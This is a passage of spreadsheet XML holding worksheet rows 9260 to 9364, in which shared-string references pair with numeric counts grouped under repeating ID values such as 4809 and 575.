    <row r="9260" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9260" t="s">
        <v>16228</v>
      </c>
      <c r="B9260" t="s">
        <v>16211</v>
      </c>
      <c r="C9260">
        <v>0</v>
      </c>
      <c r="D9260">
        <v>4809</v>
      </c>
    </row>
    <row r="9261" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9261" t="s">
        <v>16231</v>
      </c>
      <c r="B9261" t="s">
        <v>16212</v>
      </c>
      <c r="C9261">
        <v>0</v>
      </c>
      <c r="D9261">
        <v>4809</v>
      </c>
    </row>
    <row r="9262" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9262" t="s">
        <v>16228</v>
      </c>
      <c r="B9262" t="s">
        <v>16213</v>
      </c>
      <c r="C9262">
        <v>1</v>
      </c>
      <c r="D9262">
        <v>4809</v>
      </c>
    </row>
    <row r="9263" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9263" t="s">
        <v>16231</v>
      </c>
      <c r="B9263" t="s">
        <v>16214</v>
      </c>
      <c r="C9263">
        <v>1</v>
      </c>
      <c r="D9263">
        <v>4809</v>
      </c>
    </row>
    <row r="9264" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9264" t="s">
        <v>16228</v>
      </c>
      <c r="B9264" t="s">
        <v>16215</v>
      </c>
      <c r="C9264">
        <v>1</v>
      </c>
      <c r="D9264">
        <v>4809</v>
      </c>
    </row>
    <row r="9265" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9265" t="s">
        <v>16231</v>
      </c>
      <c r="B9265" t="s">
        <v>16216</v>
      </c>
      <c r="C9265">
        <v>0</v>
      </c>
      <c r="D9265">
        <v>4809</v>
      </c>
    </row>
    <row r="9266" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9266" t="s">
        <v>16228</v>
      </c>
      <c r="B9266" t="s">
        <v>16217</v>
      </c>
      <c r="C9266">
        <v>0</v>
      </c>
      <c r="D9266">
        <v>4809</v>
      </c>
    </row>
    <row r="9267" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9267" t="s">
        <v>16231</v>
      </c>
      <c r="B9267" t="s">
        <v>16218</v>
      </c>
      <c r="C9267">
        <v>1</v>
      </c>
      <c r="D9267">
        <v>4809</v>
      </c>
    </row>
    <row r="9268" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9268" t="s">
        <v>16229</v>
      </c>
      <c r="B9268" t="s">
        <v>16219</v>
      </c>
      <c r="C9268">
        <v>0</v>
      </c>
      <c r="D9268">
        <v>4809</v>
      </c>
    </row>
    <row r="9269" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9269" t="s">
        <v>16230</v>
      </c>
      <c r="B9269" t="s">
        <v>16220</v>
      </c>
      <c r="C9269">
        <v>0</v>
      </c>
      <c r="D9269">
        <v>4809</v>
      </c>
    </row>
    <row r="9270" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9270" t="s">
        <v>16229</v>
      </c>
      <c r="B9270" t="s">
        <v>16221</v>
      </c>
      <c r="C9270">
        <v>6</v>
      </c>
      <c r="D9270">
        <v>4809</v>
      </c>
    </row>
    <row r="9271" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9271" t="s">
        <v>16230</v>
      </c>
      <c r="B9271" t="s">
        <v>16222</v>
      </c>
      <c r="C9271">
        <v>0</v>
      </c>
      <c r="D9271">
        <v>4809</v>
      </c>
    </row>
    <row r="9272" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9272" t="s">
        <v>16223</v>
      </c>
      <c r="B9272" t="s">
        <v>16223</v>
      </c>
      <c r="C9272">
        <v>25</v>
      </c>
      <c r="D9272">
        <v>4809</v>
      </c>
    </row>
    <row r="9273" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9273" t="s">
        <v>16224</v>
      </c>
      <c r="B9273" t="s">
        <v>16224</v>
      </c>
      <c r="C9273">
        <v>1</v>
      </c>
      <c r="D9273">
        <v>4809</v>
      </c>
    </row>
    <row r="9274" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9274" t="s">
        <v>16228</v>
      </c>
      <c r="B9274" t="s">
        <v>16211</v>
      </c>
      <c r="C9274">
        <v>0</v>
      </c>
      <c r="D9274">
        <v>4817</v>
      </c>
    </row>
    <row r="9275" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9275" t="s">
        <v>16231</v>
      </c>
      <c r="B9275" t="s">
        <v>16212</v>
      </c>
      <c r="C9275">
        <v>0</v>
      </c>
      <c r="D9275">
        <v>4817</v>
      </c>
    </row>
    <row r="9276" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9276" t="s">
        <v>16228</v>
      </c>
      <c r="B9276" t="s">
        <v>16213</v>
      </c>
      <c r="C9276">
        <v>0</v>
      </c>
      <c r="D9276">
        <v>4817</v>
      </c>
    </row>
    <row r="9277" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9277" t="s">
        <v>16231</v>
      </c>
      <c r="B9277" t="s">
        <v>16214</v>
      </c>
      <c r="C9277">
        <v>0</v>
      </c>
      <c r="D9277">
        <v>4817</v>
      </c>
    </row>
    <row r="9278" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9278" t="s">
        <v>16228</v>
      </c>
      <c r="B9278" t="s">
        <v>16215</v>
      </c>
      <c r="C9278">
        <v>1</v>
      </c>
      <c r="D9278">
        <v>4817</v>
      </c>
    </row>
    <row r="9279" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9279" t="s">
        <v>16231</v>
      </c>
      <c r="B9279" t="s">
        <v>16216</v>
      </c>
      <c r="C9279">
        <v>1</v>
      </c>
      <c r="D9279">
        <v>4817</v>
      </c>
    </row>
    <row r="9280" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9280" t="s">
        <v>16228</v>
      </c>
      <c r="B9280" t="s">
        <v>16217</v>
      </c>
      <c r="C9280">
        <v>3</v>
      </c>
      <c r="D9280">
        <v>4817</v>
      </c>
    </row>
    <row r="9281" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9281" t="s">
        <v>16231</v>
      </c>
      <c r="B9281" t="s">
        <v>16218</v>
      </c>
      <c r="C9281">
        <v>2</v>
      </c>
      <c r="D9281">
        <v>4817</v>
      </c>
    </row>
    <row r="9282" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9282" t="s">
        <v>16229</v>
      </c>
      <c r="B9282" t="s">
        <v>16219</v>
      </c>
      <c r="C9282">
        <v>0</v>
      </c>
      <c r="D9282">
        <v>4817</v>
      </c>
    </row>
    <row r="9283" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9283" t="s">
        <v>16230</v>
      </c>
      <c r="B9283" t="s">
        <v>16220</v>
      </c>
      <c r="C9283">
        <v>0</v>
      </c>
      <c r="D9283">
        <v>4817</v>
      </c>
    </row>
    <row r="9284" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9284" t="s">
        <v>16229</v>
      </c>
      <c r="B9284" t="s">
        <v>16221</v>
      </c>
      <c r="C9284">
        <v>0</v>
      </c>
      <c r="D9284">
        <v>4817</v>
      </c>
    </row>
    <row r="9285" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9285" t="s">
        <v>16230</v>
      </c>
      <c r="B9285" t="s">
        <v>16222</v>
      </c>
      <c r="C9285">
        <v>0</v>
      </c>
      <c r="D9285">
        <v>4817</v>
      </c>
    </row>
    <row r="9286" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9286" t="s">
        <v>16223</v>
      </c>
      <c r="B9286" t="s">
        <v>16223</v>
      </c>
      <c r="C9286">
        <v>24</v>
      </c>
      <c r="D9286">
        <v>4817</v>
      </c>
    </row>
    <row r="9287" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9287" t="s">
        <v>16224</v>
      </c>
      <c r="B9287" t="s">
        <v>16224</v>
      </c>
      <c r="C9287">
        <v>1</v>
      </c>
      <c r="D9287">
        <v>4817</v>
      </c>
    </row>
    <row r="9288" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9288" t="s">
        <v>16228</v>
      </c>
      <c r="B9288" t="s">
        <v>16217</v>
      </c>
      <c r="C9288">
        <v>4</v>
      </c>
      <c r="D9288">
        <v>4817</v>
      </c>
    </row>
    <row r="9289" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9289" t="s">
        <v>16228</v>
      </c>
      <c r="B9289" t="s">
        <v>16211</v>
      </c>
      <c r="C9289">
        <v>0</v>
      </c>
      <c r="D9289">
        <v>919</v>
      </c>
    </row>
    <row r="9290" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9290" t="s">
        <v>16231</v>
      </c>
      <c r="B9290" t="s">
        <v>16212</v>
      </c>
      <c r="C9290">
        <v>0</v>
      </c>
      <c r="D9290">
        <v>919</v>
      </c>
    </row>
    <row r="9291" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9291" t="s">
        <v>16228</v>
      </c>
      <c r="B9291" t="s">
        <v>16213</v>
      </c>
      <c r="C9291">
        <v>0</v>
      </c>
      <c r="D9291">
        <v>919</v>
      </c>
    </row>
    <row r="9292" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9292" t="s">
        <v>16231</v>
      </c>
      <c r="B9292" t="s">
        <v>16214</v>
      </c>
      <c r="C9292">
        <v>0</v>
      </c>
      <c r="D9292">
        <v>919</v>
      </c>
    </row>
    <row r="9293" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9293" t="s">
        <v>16228</v>
      </c>
      <c r="B9293" t="s">
        <v>16215</v>
      </c>
      <c r="C9293">
        <v>3</v>
      </c>
      <c r="D9293">
        <v>919</v>
      </c>
    </row>
    <row r="9294" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9294" t="s">
        <v>16231</v>
      </c>
      <c r="B9294" t="s">
        <v>16216</v>
      </c>
      <c r="C9294">
        <v>1</v>
      </c>
      <c r="D9294">
        <v>919</v>
      </c>
    </row>
    <row r="9295" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9295" t="s">
        <v>16228</v>
      </c>
      <c r="B9295" t="s">
        <v>16217</v>
      </c>
      <c r="C9295">
        <v>3</v>
      </c>
      <c r="D9295">
        <v>919</v>
      </c>
    </row>
    <row r="9296" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9296" t="s">
        <v>16231</v>
      </c>
      <c r="B9296" t="s">
        <v>16218</v>
      </c>
      <c r="C9296">
        <v>0</v>
      </c>
      <c r="D9296">
        <v>919</v>
      </c>
    </row>
    <row r="9297" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9297" t="s">
        <v>16229</v>
      </c>
      <c r="B9297" t="s">
        <v>16219</v>
      </c>
      <c r="C9297">
        <v>0</v>
      </c>
      <c r="D9297">
        <v>919</v>
      </c>
    </row>
    <row r="9298" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9298" t="s">
        <v>16230</v>
      </c>
      <c r="B9298" t="s">
        <v>16220</v>
      </c>
      <c r="C9298">
        <v>0</v>
      </c>
      <c r="D9298">
        <v>919</v>
      </c>
    </row>
    <row r="9299" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9299" t="s">
        <v>16229</v>
      </c>
      <c r="B9299" t="s">
        <v>16221</v>
      </c>
      <c r="C9299">
        <v>0</v>
      </c>
      <c r="D9299">
        <v>919</v>
      </c>
    </row>
    <row r="9300" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9300" t="s">
        <v>16230</v>
      </c>
      <c r="B9300" t="s">
        <v>16222</v>
      </c>
      <c r="C9300">
        <v>3</v>
      </c>
      <c r="D9300">
        <v>919</v>
      </c>
    </row>
    <row r="9301" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9301" t="s">
        <v>16223</v>
      </c>
      <c r="B9301" t="s">
        <v>16223</v>
      </c>
      <c r="C9301">
        <v>0</v>
      </c>
      <c r="D9301">
        <v>919</v>
      </c>
    </row>
    <row r="9302" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9302" t="s">
        <v>16224</v>
      </c>
      <c r="B9302" t="s">
        <v>16224</v>
      </c>
      <c r="C9302">
        <v>0</v>
      </c>
      <c r="D9302">
        <v>919</v>
      </c>
    </row>
    <row r="9303" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9303" t="s">
        <v>16228</v>
      </c>
      <c r="B9303" t="s">
        <v>16211</v>
      </c>
      <c r="C9303">
        <v>4</v>
      </c>
      <c r="D9303">
        <v>575</v>
      </c>
    </row>
    <row r="9304" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9304" t="s">
        <v>16231</v>
      </c>
      <c r="B9304" t="s">
        <v>16212</v>
      </c>
      <c r="C9304">
        <v>1</v>
      </c>
      <c r="D9304">
        <v>575</v>
      </c>
    </row>
    <row r="9305" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9305" t="s">
        <v>16228</v>
      </c>
      <c r="B9305" t="s">
        <v>16213</v>
      </c>
      <c r="C9305">
        <v>22</v>
      </c>
      <c r="D9305">
        <v>575</v>
      </c>
    </row>
    <row r="9306" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9306" t="s">
        <v>16231</v>
      </c>
      <c r="B9306" t="s">
        <v>16214</v>
      </c>
      <c r="C9306">
        <v>140</v>
      </c>
      <c r="D9306">
        <v>575</v>
      </c>
    </row>
    <row r="9307" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9307" t="s">
        <v>16228</v>
      </c>
      <c r="B9307" t="s">
        <v>16215</v>
      </c>
      <c r="C9307">
        <v>30</v>
      </c>
      <c r="D9307">
        <v>575</v>
      </c>
    </row>
    <row r="9308" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9308" t="s">
        <v>16231</v>
      </c>
      <c r="B9308" t="s">
        <v>16216</v>
      </c>
      <c r="C9308">
        <v>5</v>
      </c>
      <c r="D9308">
        <v>575</v>
      </c>
    </row>
    <row r="9309" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9309" t="s">
        <v>16228</v>
      </c>
      <c r="B9309" t="s">
        <v>16217</v>
      </c>
      <c r="C9309">
        <v>9</v>
      </c>
      <c r="D9309">
        <v>575</v>
      </c>
    </row>
    <row r="9310" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9310" t="s">
        <v>16231</v>
      </c>
      <c r="B9310" t="s">
        <v>16218</v>
      </c>
      <c r="C9310">
        <v>5</v>
      </c>
      <c r="D9310">
        <v>575</v>
      </c>
    </row>
    <row r="9311" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9311" t="s">
        <v>16229</v>
      </c>
      <c r="B9311" t="s">
        <v>16219</v>
      </c>
      <c r="C9311">
        <v>80</v>
      </c>
      <c r="D9311">
        <v>575</v>
      </c>
    </row>
    <row r="9312" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9312" t="s">
        <v>16230</v>
      </c>
      <c r="B9312" t="s">
        <v>16220</v>
      </c>
      <c r="C9312">
        <v>0</v>
      </c>
      <c r="D9312">
        <v>575</v>
      </c>
    </row>
    <row r="9313" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9313" t="s">
        <v>16229</v>
      </c>
      <c r="B9313" t="s">
        <v>16221</v>
      </c>
      <c r="C9313">
        <v>22</v>
      </c>
      <c r="D9313">
        <v>575</v>
      </c>
    </row>
    <row r="9314" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9314" t="s">
        <v>16230</v>
      </c>
      <c r="B9314" t="s">
        <v>16222</v>
      </c>
      <c r="C9314">
        <v>50</v>
      </c>
      <c r="D9314">
        <v>575</v>
      </c>
    </row>
    <row r="9315" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9315" t="s">
        <v>16223</v>
      </c>
      <c r="B9315" t="s">
        <v>16223</v>
      </c>
      <c r="C9315">
        <v>20</v>
      </c>
      <c r="D9315">
        <v>575</v>
      </c>
    </row>
    <row r="9316" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9316" t="s">
        <v>16224</v>
      </c>
      <c r="B9316" t="s">
        <v>16224</v>
      </c>
      <c r="C9316">
        <v>1</v>
      </c>
      <c r="D9316">
        <v>575</v>
      </c>
    </row>
    <row r="9317" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9317" t="s">
        <v>16228</v>
      </c>
      <c r="B9317" t="s">
        <v>16211</v>
      </c>
      <c r="C9317">
        <v>0</v>
      </c>
      <c r="D9317">
        <v>1818</v>
      </c>
    </row>
    <row r="9318" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9318" t="s">
        <v>16231</v>
      </c>
      <c r="B9318" t="s">
        <v>16212</v>
      </c>
      <c r="C9318">
        <v>0</v>
      </c>
      <c r="D9318">
        <v>1818</v>
      </c>
    </row>
    <row r="9319" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9319" t="s">
        <v>16228</v>
      </c>
      <c r="B9319" t="s">
        <v>16213</v>
      </c>
      <c r="C9319">
        <v>0</v>
      </c>
      <c r="D9319">
        <v>1818</v>
      </c>
    </row>
    <row r="9320" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9320" t="s">
        <v>16231</v>
      </c>
      <c r="B9320" t="s">
        <v>16214</v>
      </c>
      <c r="C9320">
        <v>0</v>
      </c>
      <c r="D9320">
        <v>1818</v>
      </c>
    </row>
    <row r="9321" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9321" t="s">
        <v>16228</v>
      </c>
      <c r="B9321" t="s">
        <v>16215</v>
      </c>
      <c r="C9321">
        <v>0</v>
      </c>
      <c r="D9321">
        <v>1818</v>
      </c>
    </row>
    <row r="9322" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9322" t="s">
        <v>16231</v>
      </c>
      <c r="B9322" t="s">
        <v>16216</v>
      </c>
      <c r="C9322">
        <v>0</v>
      </c>
      <c r="D9322">
        <v>1818</v>
      </c>
    </row>
    <row r="9323" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9323" t="s">
        <v>16228</v>
      </c>
      <c r="B9323" t="s">
        <v>16217</v>
      </c>
      <c r="C9323">
        <v>0</v>
      </c>
      <c r="D9323">
        <v>1818</v>
      </c>
    </row>
    <row r="9324" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9324" t="s">
        <v>16231</v>
      </c>
      <c r="B9324" t="s">
        <v>16218</v>
      </c>
      <c r="C9324">
        <v>0</v>
      </c>
      <c r="D9324">
        <v>1818</v>
      </c>
    </row>
    <row r="9325" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9325" t="s">
        <v>16229</v>
      </c>
      <c r="B9325" t="s">
        <v>16219</v>
      </c>
      <c r="C9325">
        <v>0</v>
      </c>
      <c r="D9325">
        <v>1818</v>
      </c>
    </row>
    <row r="9326" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9326" t="s">
        <v>16230</v>
      </c>
      <c r="B9326" t="s">
        <v>16220</v>
      </c>
      <c r="C9326">
        <v>0</v>
      </c>
      <c r="D9326">
        <v>1818</v>
      </c>
    </row>
    <row r="9327" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9327" t="s">
        <v>16229</v>
      </c>
      <c r="B9327" t="s">
        <v>16221</v>
      </c>
      <c r="C9327">
        <v>5</v>
      </c>
      <c r="D9327">
        <v>1818</v>
      </c>
    </row>
    <row r="9328" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9328" t="s">
        <v>16230</v>
      </c>
      <c r="B9328" t="s">
        <v>16222</v>
      </c>
      <c r="C9328">
        <v>30</v>
      </c>
      <c r="D9328">
        <v>1818</v>
      </c>
    </row>
    <row r="9329" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9329" t="s">
        <v>16223</v>
      </c>
      <c r="B9329" t="s">
        <v>16223</v>
      </c>
      <c r="C9329">
        <v>24</v>
      </c>
      <c r="D9329">
        <v>1818</v>
      </c>
    </row>
    <row r="9330" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9330" t="s">
        <v>16224</v>
      </c>
      <c r="B9330" t="s">
        <v>16224</v>
      </c>
      <c r="C9330">
        <v>0</v>
      </c>
      <c r="D9330">
        <v>1818</v>
      </c>
    </row>
    <row r="9331" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9331" t="s">
        <v>16228</v>
      </c>
      <c r="B9331" t="s">
        <v>16211</v>
      </c>
      <c r="C9331">
        <v>0</v>
      </c>
      <c r="D9331">
        <v>2814</v>
      </c>
    </row>
    <row r="9332" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9332" t="s">
        <v>16231</v>
      </c>
      <c r="B9332" t="s">
        <v>16212</v>
      </c>
      <c r="C9332">
        <v>0</v>
      </c>
      <c r="D9332">
        <v>2814</v>
      </c>
    </row>
    <row r="9333" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9333" t="s">
        <v>16228</v>
      </c>
      <c r="B9333" t="s">
        <v>16213</v>
      </c>
      <c r="C9333">
        <v>0</v>
      </c>
      <c r="D9333">
        <v>2814</v>
      </c>
    </row>
    <row r="9334" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9334" t="s">
        <v>16231</v>
      </c>
      <c r="B9334" t="s">
        <v>16214</v>
      </c>
      <c r="C9334">
        <v>0</v>
      </c>
      <c r="D9334">
        <v>2814</v>
      </c>
    </row>
    <row r="9335" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9335" t="s">
        <v>16228</v>
      </c>
      <c r="B9335" t="s">
        <v>16215</v>
      </c>
      <c r="C9335">
        <v>8</v>
      </c>
      <c r="D9335">
        <v>2814</v>
      </c>
    </row>
    <row r="9336" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9336" t="s">
        <v>16231</v>
      </c>
      <c r="B9336" t="s">
        <v>16216</v>
      </c>
      <c r="C9336">
        <v>2</v>
      </c>
      <c r="D9336">
        <v>2814</v>
      </c>
    </row>
    <row r="9337" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9337" t="s">
        <v>16228</v>
      </c>
      <c r="B9337" t="s">
        <v>16217</v>
      </c>
      <c r="C9337">
        <v>0</v>
      </c>
      <c r="D9337">
        <v>2814</v>
      </c>
    </row>
    <row r="9338" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9338" t="s">
        <v>16231</v>
      </c>
      <c r="B9338" t="s">
        <v>16218</v>
      </c>
      <c r="C9338">
        <v>0</v>
      </c>
      <c r="D9338">
        <v>2814</v>
      </c>
    </row>
    <row r="9339" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9339" t="s">
        <v>16229</v>
      </c>
      <c r="B9339" t="s">
        <v>16219</v>
      </c>
      <c r="C9339">
        <v>0</v>
      </c>
      <c r="D9339">
        <v>2814</v>
      </c>
    </row>
    <row r="9340" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9340" t="s">
        <v>16230</v>
      </c>
      <c r="B9340" t="s">
        <v>16220</v>
      </c>
      <c r="C9340">
        <v>0</v>
      </c>
      <c r="D9340">
        <v>2814</v>
      </c>
    </row>
    <row r="9341" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9341" t="s">
        <v>16229</v>
      </c>
      <c r="B9341" t="s">
        <v>16221</v>
      </c>
      <c r="C9341">
        <v>5</v>
      </c>
      <c r="D9341">
        <v>2814</v>
      </c>
    </row>
    <row r="9342" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9342" t="s">
        <v>16230</v>
      </c>
      <c r="B9342" t="s">
        <v>16222</v>
      </c>
      <c r="C9342">
        <v>0</v>
      </c>
      <c r="D9342">
        <v>2814</v>
      </c>
    </row>
    <row r="9343" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9343" t="s">
        <v>16223</v>
      </c>
      <c r="B9343" t="s">
        <v>16223</v>
      </c>
      <c r="C9343">
        <v>26</v>
      </c>
      <c r="D9343">
        <v>2814</v>
      </c>
    </row>
    <row r="9344" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9344" t="s">
        <v>16224</v>
      </c>
      <c r="B9344" t="s">
        <v>16224</v>
      </c>
      <c r="C9344">
        <v>0</v>
      </c>
      <c r="D9344">
        <v>2814</v>
      </c>
    </row>
    <row r="9345" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9345" t="s">
        <v>16228</v>
      </c>
      <c r="B9345" t="s">
        <v>16211</v>
      </c>
      <c r="C9345">
        <v>0</v>
      </c>
      <c r="D9345">
        <v>550</v>
      </c>
    </row>
    <row r="9346" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9346" t="s">
        <v>16231</v>
      </c>
      <c r="B9346" t="s">
        <v>16212</v>
      </c>
      <c r="C9346">
        <v>0</v>
      </c>
      <c r="D9346">
        <v>550</v>
      </c>
    </row>
    <row r="9347" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9347" t="s">
        <v>16228</v>
      </c>
      <c r="B9347" t="s">
        <v>16213</v>
      </c>
      <c r="C9347">
        <v>0</v>
      </c>
      <c r="D9347">
        <v>550</v>
      </c>
    </row>
    <row r="9348" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9348" t="s">
        <v>16231</v>
      </c>
      <c r="B9348" t="s">
        <v>16214</v>
      </c>
      <c r="C9348">
        <v>0</v>
      </c>
      <c r="D9348">
        <v>550</v>
      </c>
    </row>
    <row r="9349" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9349" t="s">
        <v>16228</v>
      </c>
      <c r="B9349" t="s">
        <v>16215</v>
      </c>
      <c r="C9349">
        <v>2</v>
      </c>
      <c r="D9349">
        <v>550</v>
      </c>
    </row>
    <row r="9350" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9350" t="s">
        <v>16231</v>
      </c>
      <c r="B9350" t="s">
        <v>16216</v>
      </c>
      <c r="C9350">
        <v>1</v>
      </c>
      <c r="D9350">
        <v>550</v>
      </c>
    </row>
    <row r="9351" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9351" t="s">
        <v>16228</v>
      </c>
      <c r="B9351" t="s">
        <v>16217</v>
      </c>
      <c r="C9351">
        <v>2</v>
      </c>
      <c r="D9351">
        <v>550</v>
      </c>
    </row>
    <row r="9352" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9352" t="s">
        <v>16231</v>
      </c>
      <c r="B9352" t="s">
        <v>16218</v>
      </c>
      <c r="C9352">
        <v>0</v>
      </c>
      <c r="D9352">
        <v>550</v>
      </c>
    </row>
    <row r="9353" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9353" t="s">
        <v>16229</v>
      </c>
      <c r="B9353" t="s">
        <v>16219</v>
      </c>
      <c r="C9353">
        <v>0</v>
      </c>
      <c r="D9353">
        <v>550</v>
      </c>
    </row>
    <row r="9354" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9354" t="s">
        <v>16230</v>
      </c>
      <c r="B9354" t="s">
        <v>16220</v>
      </c>
      <c r="C9354">
        <v>0</v>
      </c>
      <c r="D9354">
        <v>550</v>
      </c>
    </row>
    <row r="9355" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9355" t="s">
        <v>16229</v>
      </c>
      <c r="B9355" t="s">
        <v>16221</v>
      </c>
      <c r="C9355">
        <v>6</v>
      </c>
      <c r="D9355">
        <v>550</v>
      </c>
    </row>
    <row r="9356" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9356" t="s">
        <v>16230</v>
      </c>
      <c r="B9356" t="s">
        <v>16222</v>
      </c>
      <c r="C9356">
        <v>5</v>
      </c>
      <c r="D9356">
        <v>550</v>
      </c>
    </row>
    <row r="9357" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9357" t="s">
        <v>16223</v>
      </c>
      <c r="B9357" t="s">
        <v>16223</v>
      </c>
      <c r="C9357">
        <v>26</v>
      </c>
      <c r="D9357">
        <v>550</v>
      </c>
    </row>
    <row r="9358" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9358" t="s">
        <v>16224</v>
      </c>
      <c r="B9358" t="s">
        <v>16224</v>
      </c>
      <c r="C9358">
        <v>1</v>
      </c>
      <c r="D9358">
        <v>550</v>
      </c>
    </row>
    <row r="9359" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9359" t="s">
        <v>16228</v>
      </c>
      <c r="B9359" t="s">
        <v>16211</v>
      </c>
      <c r="C9359">
        <v>0</v>
      </c>
      <c r="D9359">
        <v>2036</v>
      </c>
    </row>
    <row r="9360" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9360" t="s">
        <v>16231</v>
      </c>
      <c r="B9360" t="s">
        <v>16212</v>
      </c>
      <c r="C9360">
        <v>0</v>
      </c>
      <c r="D9360">
        <v>2036</v>
      </c>
    </row>
    <row r="9361" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9361" t="s">
        <v>16228</v>
      </c>
      <c r="B9361" t="s">
        <v>16213</v>
      </c>
      <c r="C9361">
        <v>0</v>
      </c>
      <c r="D9361">
        <v>2036</v>
      </c>
    </row>
    <row r="9362" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9362" t="s">
        <v>16231</v>
      </c>
      <c r="B9362" t="s">
        <v>16214</v>
      </c>
      <c r="C9362">
        <v>0</v>
      </c>
      <c r="D9362">
        <v>2036</v>
      </c>
    </row>
    <row r="9363" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9363" t="s">
        <v>16228</v>
      </c>
      <c r="B9363" t="s">
        <v>16215</v>
      </c>
      <c r="C9363">
        <v>2</v>
      </c>
      <c r="D9363">
        <v>2036</v>
      </c>
    </row>
    <row r="9364" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9364" t="s">
        <v>16231</v>
      </c>
      <c r="B9364" t="s">
        <v>16216</v>
      </c>
      <c r="C9364">
        <v>3</v>
      </c>
      <c r="D9364">
        <v>2036</v>
      </c>
    </row>
